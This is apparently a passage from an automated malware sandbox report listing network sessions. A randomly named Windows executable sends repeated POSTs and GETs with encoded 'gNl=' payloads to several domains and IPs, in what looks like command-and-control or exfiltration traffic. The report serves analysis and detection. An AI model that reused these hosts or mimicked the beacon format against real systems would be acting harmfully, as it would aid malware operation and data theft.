                                              Data Raw: 67 4e 6c 3d 35 72 44 33 52 41 6d 6e 6f 36 76 38 59 79 37 57 37 47 4f 30 41 49 68 4b 59 42 4d 2f 77 2f 6a 51 51 66 59 2b 75 76 38 62 68 76 37 74 48 4c 33 62 2b 30 52 32 36 43 2b 48 54 37 5a 31 33 59 6f 34 70 62 73 42 56 78 4a 6a 35 4e 48 70 75 4b 4b 30 47 75 68 36 79 52 45 46 62 74 46 64 2f 47 69 65 38 71 48 33 43 45 64 35 66 46 78 7a 46 6d 33 4e 72 32 37 54 6e 2b 62 6f 74 4e 76 5a 6a 6e 63 79 67 63 52 6a 53 79 5a 32 61 59 32 67 35 54 74 64 39 63 31 6a 73 7a 44 79 38 46 73 44 4b 34 44 59 7a 63 41 44 36 41 71 45 34 4e 52 4a 6b 54 70 46 77 69 6c 70 59 39 47 4a 6b 4b 53 70 6a 54 50 78 79 41 3d 3d
                                              Data Ascii: gNl=5rD3RAmno6v8Yy7W7GO0AIhKYBM/w/jQQfY+uv8bhv7tHL3b+0R26C+HT7Z13Yo4pbsBVxJj5NHpuKK0Guh6yREFbtFd/Gie8qH3CEd5fFxzFm3Nr27Tn+botNvZjncygcRjSyZ2aY2g5Ttd9c1jszDy8FsDK4DYzcAD6AqE4NRJkTpFwilpY9GJkKSpjTPxyA==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              34192.168.2.449776132.226.11.158805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:35:58.089072943 CEST736OUTPOST /w2w0/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.hf7777hi.net
                                              Origin: http://www.hf7777hi.net
                                              Referer: http://www.hf7777hi.net/w2w0/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 35 72 44 33 52 41 6d 6e 6f 36 76 38 5a 53 4c 57 39 67 47 30 43 6f 68 4a 56 52 4d 2f 36 66 6a 55 51 66 55 2b 75 75 35 45 67 63 66 74 48 71 48 62 2f 78 39 32 32 69 2b 48 63 62 5a 77 6f 49 6f 78 70 62 68 30 56 31 4a 6a 35 4e 54 70 75 4b 36 30 48 5a 56 35 7a 42 45 48 43 39 46 66 38 32 69 65 38 71 48 33 43 41 39 44 66 46 70 7a 45 57 6e 4e 72 55 54 51 34 4f 62 72 71 4e 76 5a 79 33 63 32 67 63 51 41 53 7a 46 4d 61 61 4f 67 35 54 39 64 38 4e 31 73 69 7a 44 77 79 6c 74 4d 48 62 62 54 72 6f 5a 66 34 47 2f 6c 36 75 52 70 6f 31 34 66 68 54 45 2b 4b 39 69 36 35 4e 62 64 75 51 79 34 70 42 79 2b 78 42 76 38 71 72 31 51 76 6e 4d 55 42 6e 4d 63 54 4d 6b 3d
                                              Data Ascii: gNl=5rD3RAmno6v8ZSLW9gG0CohJVRM/6fjUQfU+uu5EgcftHqHb/x922i+HcbZwoIoxpbh0V1Jj5NTpuK60HZV5zBEHC9Ff82ie8qH3CA9DfFpzEWnNrUTQ4ObrqNvZy3c2gcQASzFMaaOg5T9d8N1sizDwyltMHbbTroZf4G/l6uRpo14fhTE+K9i65NbduQy4pBy+xBv8qr1QvnMUBnMcTMk=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              35192.168.2.449777132.226.11.158805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:36:00.624855042 CEST10818OUTPOST /w2w0/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.hf7777hi.net
                                              Origin: http://www.hf7777hi.net
                                              Referer: http://www.hf7777hi.net/w2w0/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 35 72 44 33 52 41 6d 6e 6f 36 76 38 5a 53 4c 57 39 67 47 30 43 6f 68 4a 56 52 4d 2f 36 66 6a 55 51 66 55 2b 75 75 35 45 67 63 58 74 48 63 54 62 2f 53 6c 32 33 69 2b 48 56 37 5a 78 6f 49 70 7a 70 61 49 38 56 30 30 59 35 4f 72 70 38 35 43 30 4f 4d 35 35 71 52 45 48 4e 64 46 65 2f 47 69 48 38 71 57 77 43 45 5a 44 66 46 70 7a 45 51 6a 4e 74 47 37 51 6a 4f 62 6f 74 4e 76 4e 6a 6e 63 4f 67 63 49 2b 53 7a 51 75 62 71 75 67 34 79 4e 64 78 66 64 73 71 7a 44 32 31 6c 73 54 48 62 6d 4c 72 70 78 54 34 47 69 77 36 70 68 70 6f 30 35 75 32 78 30 57 65 73 54 6a 76 74 33 4c 6f 42 58 39 6d 7a 66 4c 32 78 48 68 70 37 74 30 73 41 68 43 54 48 6b 6e 45 71 67 72 47 31 49 58 33 66 52 56 6c 49 44 61 45 6d 62 58 6c 42 4a 7a 61 61 6a 58 56 44 4c 53 2f 65 75 39 57 41 32 65 70 43 79 51 79 57 63 38 4b 30 74 71 6b 50 56 50 6b 6a 54 2b 51 37 4d 72 6f 2f 6f 31 4c 74 79 4b 6b 44 72 47 49 54 74 54 4a 72 77 41 6f 4f 78 63 50 69 67 76 53 34 71 6a 53 63 6d 61 4f 32 76 49 32 35 32 2f 7a 2b 49 69 6d 71 34 6d 6b 72 2b 4f 43 50 [TRUNCATED]
                                              Data Ascii: gNl=5rD3RAmno6v8ZSLW9gG0CohJVRM/6fjUQfU+uu5EgcXtHcTb/Sl23i+HV7ZxoIpzpaI8V00Y5Orp85C0OM55qREHNdFe/GiH8qWwCEZDfFpzEQjNtG7QjObotNvNjncOgcI+SzQubqug4yNdxfdsqzD21lsTHbmLrpxT4Giw6phpo05u2x0WesTjvt3LoBX9mzfL2xHhp7t0sAhCTHknEqgrG1IX3fRVlIDaEmbXlBJzaajXVDLS/eu9WA2epCyQyWc8K0tqkPVPkjT+Q7Mro/o1LtyKkDrGITtTJrwAoOxcPigvS4qjScmaO2vI252/z+Iimq4mkr+OCPp9G+lXSLaOQr3cHwVvU90R9UAq0IYQ4rTpbxMR/eQmOUUhYDBD08oQP9ZEB6jrKTnierpaPc+T6GQB9KCh5LE4AHxXsCd9peKWNRpxZC3iuZhKNYN/BtjdeL6vNLuiK9l8dZT2XU9Cwm+Z1EPK8Uju6fXHaZJ9m8oIYjr16zlqqrX0fmfCld4rrAUTwvM6YIuNk896/y4ObRUpct8aOZnqbeGs80hvDu6sLwU2DmoGpL6Z5uoBk+EKYw9nAwcrWRkiTaOGavJ26B1OIDL0Jmi8f2vGIKVBDZD3rdqoJ74SfZQLIaMiCc75xG94ZAAqIJrsELdEKhFVVFhjQDTl91UyVyF6+jiLVpFnZkodKgw3E4/KUu2KcTFdlb3UcghFpF/ozpLzjGXRqVI2tKoRZFpAvdo87Iz2d3P2BJVODxkP8s0rD8/OriG7J+jqOZQn7gdpBBkDD1vFTZzuQtCbMBEcaruaL/puc18ETUMZr+8is0NBfp2xrx2fGuPQ6mh/fCK1b+7yQ7tZ50xVm8KLy8AIz4vLl2dsod7K4BxlKuPS/45P0tybJa6zE4seq5dwV4xSa+zPCLmFZyesQ1pb52wsVM+Y1mn4taqUd6AXby9wD8RdS02wf/fG27hiVsUPcu2h5VtIx9kS6adVcDeGGelZOMYj7LSJSYn6 [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              36192.168.2.449778132.226.11.158805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:36:03.168662071 CEST451OUTGET /w2w0/?gNl=0prXS1nuo7L4BRXFxH+6P5N8ZSQ81sbrd+caxMQkr8e3H5z/+yVS+HOiTMdRuolLjIsNRBtZ8MXFl+jKIOJJ6lQvMONrxVe4j9OmCVx+YV9WHy3pokjU6vI=&QdC=AFMh5N HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.hf7777hi.net
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              37192.168.2.449779217.160.0.119805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:36:29.550105095 CEST725OUTPOST /3rdj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.qrdinamicos.com
                                              Origin: http://www.qrdinamicos.com
                                              Referer: http://www.qrdinamicos.com/3rdj/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 75 62 70 50 78 45 47 6a 64 35 61 34 71 4a 6f 78 66 52 71 53 49 36 41 43 4b 49 2b 4b 47 58 4d 78 31 63 52 4f 37 42 69 4a 43 64 2b 74 74 73 63 51 6c 63 6e 54 4c 65 53 78 47 4f 34 51 68 4c 36 56 6e 34 52 55 68 49 75 33 33 33 73 33 4c 4b 49 53 64 7a 5a 49 39 64 75 43 33 64 55 2f 79 30 61 74 63 4b 30 7a 76 4c 36 57 7a 47 4a 5a 39 2f 38 4a 75 64 41 4a 59 4c 6f 69 74 52 6d 76 41 41 66 5a 2f 45 70 73 7a 74 53 51 7a 2f 69 4a 39 6d 56 62 79 6d 6e 35 68 31 48 43 30 56 74 4c 63 65 35 41 35 38 67 45 6e 58 50 4b 62 71 31 38 30 50 73 6b 75 48 48 69 5a 76 72 65 68 61 64 6a 41 4f 6a 50 48 77 3d 3d
                                              Data Ascii: gNl=ubpPxEGjd5a4qJoxfRqSI6ACKI+KGXMx1cRO7BiJCd+ttscQlcnTLeSxGO4QhL6Vn4RUhIu333s3LKISdzZI9duC3dU/y0atcK0zvL6WzGJZ9/8JudAJYLoitRmvAAfZ/EpsztSQz/iJ9mVbymn5h1HC0VtLce5A58gEnXPKbq180PskuHHiZvrehadjAOjPHw==
                                              Jul 8, 2024 09:36:30.223695040 CEST572INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Date: Mon, 08 Jul 2024 07:36:30 GMT
                                              Server: Apache
                                              Content-Encoding: gzip
                                              Data Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d [TRUNCATED]
                                              Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              38192.168.2.449780217.160.0.119805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:36:32.088742018 CEST745OUTPOST /3rdj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.qrdinamicos.com
                                              Origin: http://www.qrdinamicos.com
                                              Referer: http://www.qrdinamicos.com/3rdj/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 75 62 70 50 78 45 47 6a 64 35 61 34 71 70 34 78 54 58 69 53 5a 71 41 46 46 6f 2b 4b 4d 33 4d 31 31 62 5a 4f 37 41 6d 6e 43 76 71 74 75 4a 34 51 6d 64 6e 54 48 2b 53 78 4f 75 34 52 72 72 36 4b 6e 34 4e 63 68 4e 57 33 33 33 34 33 4c 49 67 53 64 45 6c 4a 79 74 75 63 36 39 55 78 78 45 61 74 63 4b 30 7a 76 4b 4b 77 7a 47 52 5a 39 72 34 4a 68 63 41 4b 52 72 6f 6a 39 42 6d 76 52 51 66 64 2f 45 70 53 7a 73 50 59 7a 38 61 4a 39 6d 46 62 78 33 6e 2b 72 31 48 41 36 31 73 5a 58 73 55 50 2b 64 45 4e 68 46 6a 78 63 37 70 4b 38 70 39 2b 2f 32 6d 31 4c 76 50 74 38 64 55 58 4e 4e 65 47 63 34 32 54 69 74 30 38 30 38 6f 6d 2b 34 55 70 39 67 7a 49 41 64 6f 3d
                                              Data Ascii: gNl=ubpPxEGjd5a4qp4xTXiSZqAFFo+KM3M11bZO7AmnCvqtuJ4QmdnTH+SxOu4Rrr6Kn4NchNW33343LIgSdElJytuc69UxxEatcK0zvKKwzGRZ9r4JhcAKRroj9BmvRQfd/EpSzsPYz8aJ9mFbx3n+r1HA61sZXsUP+dENhFjxc7pK8p9+/2m1LvPt8dUXNNeGc42Tit0808om+4Up9gzIAdo=
                                              Jul 8, 2024 09:36:32.728183985 CEST572INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Date: Mon, 08 Jul 2024 07:36:32 GMT
                                              Server: Apache
                                              Content-Encoding: gzip
                                              Data Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d [TRUNCATED]
                                              Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              39192.168.2.449781217.160.0.119805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:36:34.626574993 CEST10827OUTPOST /3rdj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.qrdinamicos.com
                                              Origin: http://www.qrdinamicos.com
                                              Referer: http://www.qrdinamicos.com/3rdj/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 75 62 70 50 78 45 47 6a 64 35 61 34 71 70 34 78 54 58 69 53 5a 71 41 46 46 6f 2b 4b 4d 33 4d 31 31 62 5a 4f 37 41 6d 6e 43 75 53 74 75 2f 6b 51 68 4b 62 54 47 2b 53 78 45 4f 34 55 72 72 37 51 6e 34 46 69 68 4d 71 64 33 30 41 33 4e 70 41 53 55 56 6c 4a 70 64 75 63 6d 4e 55 77 79 30 61 43 63 4b 6b 2f 76 4b 36 77 7a 47 52 5a 39 71 49 4a 6c 4e 41 4b 58 72 6f 69 74 52 6d 6f 41 41 66 6c 2f 41 38 70 7a 76 6a 49 7a 4e 36 4a 39 48 31 62 30 46 50 2b 70 56 48 65 35 31 74 63 58 73 5a 50 2b 64 5a 30 68 42 6a 62 63 37 4e 4b 2b 64 63 69 71 53 2b 38 59 63 2b 77 67 36 4d 78 4c 76 79 7a 55 35 6d 58 71 74 41 37 6d 38 34 4c 38 59 74 73 76 53 33 53 61 61 47 30 56 61 76 41 67 58 48 6f 61 65 45 6e 38 56 66 36 65 68 4f 49 63 35 2f 46 72 4c 5a 5a 50 66 44 34 77 36 51 4c 4d 62 31 39 74 6e 43 34 41 6a 67 4f 73 53 70 4e 42 71 57 48 68 6c 37 42 41 32 7a 76 5a 76 65 54 6f 68 44 4b 4b 79 5a 32 41 74 43 51 62 58 49 41 66 61 43 61 4f 74 38 4d 43 43 2f 39 58 4e 44 46 73 58 63 36 65 77 6c 78 2f 58 58 36 50 4f 6c 63 4a 68 [TRUNCATED]
                                              Data Ascii: gNl=ubpPxEGjd5a4qp4xTXiSZqAFFo+KM3M11bZO7AmnCuStu/kQhKbTG+SxEO4Urr7Qn4FihMqd30A3NpASUVlJpducmNUwy0aCcKk/vK6wzGRZ9qIJlNAKXroitRmoAAfl/A8pzvjIzN6J9H1b0FP+pVHe51tcXsZP+dZ0hBjbc7NK+dciqS+8Yc+wg6MxLvyzU5mXqtA7m84L8YtsvS3SaaG0VavAgXHoaeEn8Vf6ehOIc5/FrLZZPfD4w6QLMb19tnC4AjgOsSpNBqWHhl7BA2zvZveTohDKKyZ2AtCQbXIAfaCaOt8MCC/9XNDFsXc6ewlx/XX6POlcJhXS0DeWek2HsOIIYalIYzzJ9Khltcfng4GTTZ1cDgzS1fddPEsQE/6h+NQZg/Hx8S13rb4nWkvnx/Q/e2SRVWjVOUjrgs9aGaBs2/G4MhDA/E5n2E7lzjnj1lU9f/7ZxCyLWp2Wo6bhxF/Nh3S3GolsI8bJdEyZgMu3DJIGU+YXnKdo5/V56LOnHhtm8Yj8YXEG0Is4Y/HcTk19qUq3LA8q01eS4+NXxCrCMxwKpa/Ka6FqJyWqelgZeKUg8Wc8c8y00o+Tu9CnpaI7H6igt+qtRR9QWAuZ75RJ+qyUJz67s9RwuJ1RSS5vqKBhKEpFFNRNsIzjWAdQCrHtCJTRVCDopbnF6ZS81gmF8FU8dvYmTFZCmImLejjaYShS8rBebZUY5zslZCUF9b0Vi9qlHwleLGWdVZDaswUWY3GWuYKuoCA2TdJsmj1AjBwFi/PjQDDJgaW9FJYlUVeJusVzw3Ic7b0CdQEGE3v7UcUgI8mRU26MmRf3X0BnxYsfLZhVZ1y6SVKfiWlWgFHSa+MpTXZTWQ39pzE5yPc7OMXNkXWTddltZ3ArEpOUVVS18Y7+Knua2KKczc/iXRLcOCjWZyfUSSEKo5uPrSYioh3mOWDAWTXZqMmSgckeFY5/KU5Tvn1T5HmGYGs8XNb/PlpYPbFu0rUdrpq8WWMl [TRUNCATED]
                                              Jul 8, 2024 09:36:35.282764912 CEST572INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Date: Mon, 08 Jul 2024 07:36:35 GMT
                                              Server: Apache
                                              Content-Encoding: gzip
                                              Data Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d [TRUNCATED]
                                              Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              40192.168.2.449782217.160.0.119805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:36:37.170553923 CEST454OUTGET /3rdj/?QdC=AFMh5N&gNl=jZBvy0udQ72nya4zXQbiXt45CoTcGWwSxfgakTq4JdzmmcUs/sbVPe6dK9wcjd2s4Il3pIOfxWomFNoQbEAT45u/xcgM8nK3ctQKu/SLrVpagLQNn/wFC6g= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.qrdinamicos.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Jul 8, 2024 09:36:37.825562954 CEST740INHTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Content-Length: 596
                                              Connection: close
                                              Date: Mon, 08 Jul 2024 07:36:37 GMT
                                              Server: Apache
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              41192.168.2.449783103.168.172.37805764C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 8, 2024 09:36:51.146475077 CEST716OUTPOST /blhi/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.jleabres.com
                                              Origin: http://www.jleabres.com
                                              Referer: http://www.jleabres.com/blhi/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
